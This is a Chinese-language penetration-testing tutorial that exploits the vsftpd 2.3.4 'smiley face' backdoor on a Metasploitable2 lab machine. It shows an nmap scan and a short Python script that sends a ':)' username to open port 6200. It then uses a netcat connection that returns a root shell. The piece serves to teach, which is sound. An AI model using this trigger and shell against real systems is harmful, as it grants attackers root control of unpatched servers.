Kali渗透测试-远程控制:6200端口变成“后门”

简介: Kali渗透测试-远程控制:6200端口变成“后门”

Kali渗透测试-远程控制:6200端口变成“后门”
测试环境
攻击机:Linux kali 5.16.0-kali7-amd64 (IP:192.168.68.248)

靶机:Metasploitable2 - Linux (IP:192.168.68.205)

攻击工具:Netcat(nc) “瑞士军刀”

扫描工具:Nmap version 7.92

漏洞是黑客进入计算机的入口,如果目标主机上运行的vsftpd-2.3.4被黑客使用笑脸漏洞成功渗透,就会自动在6200端口打开一个连接,从而通过这个连接失效对目标主机的控制。关于“笑脸漏洞”大家可以自行搜索一下相关信息。

测试步骤
1. 攻击上运行nmap扫描

┌──(kali㉿kali)-[~]
└─$ nmap --script ftp-vsftpd-backdoor 192.168.68.205

image.png

2. Netcat 扫描端口测试连接
以靶机80端口为例测试,命令如下:

┌──(kali㉿kali)-[~]
└─$ nc -v 192.168.68.205 80  
192.168.68.205: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.68.205] 80 (http) open

可以看到这个端口状态为open, 也就是开放的。接下来试一下可否通过80端口控制目标, 命令如下:

┌──(kali㉿kali)-[~]
└─$ nc 192.168.68.205 80

测试完成之后,系统会暂时没有反应。再输入一条Linux操作系统用于现实用户名称的whoami命令,以此来查看是否能通过80端口来控制目标,如下图所示:
image.png

虽然出现了如上提示,但这只是Metasploittable2的欢迎界面,尝试失败。

3. 激活笑脸漏洞,开启6200端口
分享一段注入脚本代码,如下:

import socket
from ftplib import FTP
host_ip = '192.168.68.205'
ftp = FTP()
backdoorstr = 'hello:)'
backdoorpass = "it's me"
try:
    ftp.connect(host_ip, 21, timeout = 2)
    ftp.login(backdoorstr, backdoorpass)
except:
    print('完成笑脸注入')

image.png

先运行注入脚本,如上图所示,注入成功。然后运行如下命令:

┌──(kali㉿kali)-[~]
└─$ nc 192.168.68.205 6200

运行结果如下图:

image.png

虽然只显示了一个光标,但是对Netcat表示已经成功连接了。

4. 输入测试命令
输入如下命令,得到回应–root

┌──(kali㉿kali)-[~]
└─$ nc 192.168.68.205 6200                                                                                              1 ⨯
whoami
root

以root身份登录,然后输入其他测试命令,如“ls”、 “cd”、 “pwd”也都成功,如下图所示:

image.png

image.png

通过如上测试,可以看到6200端口上运行的vsftd-2.3.4。当用户名中存在“:)”两个连续的符号时,就会激活vsf_sysutil_extra函数,这个函数会在本地建立一个socket,然后绑定到6200端口,之后调用exec函数绑定/bin/sh。

相关文章
|
4月前
|
存储 安全 Linux
Kali Linux 2025.3 发布 (Vagrant & Nexmon) - 领先的渗透测试发行版
Kali Linux 2025.3 发布 (Vagrant & Nexmon) - 领先的渗透测试发行版
660 0
|
9月前
|
JSON 测试技术 API
优化你的 REST Assured 测试:设置默认主机与端口、GET 请求与断言
REST Assured 是一个强大的 Java 库,用于简化 RESTful API 测试。本文详解了其核心功能:设置默认主机和端口以减少代码重复、发起 GET 请求并验证响应结果,以及通过断言确保接口行为符合预期。同时推荐 Apipost 工具,助力开发者提升 API 测试效率,实现更高效的接口管理与团队协作。掌握这些技巧,可显著优化测试流程与代码质量。
|
7月前
|
存储 安全 Linux
Kali Linux 2025.2 发布 (Kali 菜单焕新、BloodHound CE 和 CARsenal) - 领先的渗透测试发行版
Kali Linux 2025.2 发布 (Kali 菜单焕新、BloodHound CE 和 CARsenal) - 领先的渗透测试发行版
444 0
|
编解码 安全 Linux
网络空间安全之一个WH的超前沿全栈技术深入学习之路(10-2):保姆级别教会你如何搭建白帽黑客渗透测试系统环境Kali——Liinux-Debian:就怕你学成黑客啦!)作者——LJS
保姆级别教会你如何搭建白帽黑客渗透测试系统环境Kali以及常见的报错及对应解决方案、常用Kali功能简便化以及详解如何具体实现
|
网络协议 安全 Linux
Kali渗透测试:拒绝服务攻击(一)
Kali渗透测试:拒绝服务攻击(一)
759 2
|
存储 网络协议 安全
Kali渗透测试:拒绝服务攻击(二)
Kali渗透测试:拒绝服务攻击(二)
993 0
|
安全 网络安全
Kali渗透测试:使用Armitage扫描网络
Kali渗透测试:使用Armitage扫描网络
253 3
|
安全 Linux 网络安全
Kali 渗透测试:基于结构化异常处理的渗透-使用Python编写渗透模块(一)
Kali 渗透测试:基于结构化异常处理的渗透-使用Python编写渗透模块(一)
428 2
|
Python Windows 网络安全
Kali 渗透测试:基于结构化异常处理的渗透-使用Python编写渗透模块(二)
Kali 渗透测试:基于结构化异常处理的渗透-使用Python编写渗透模块(二)
255 2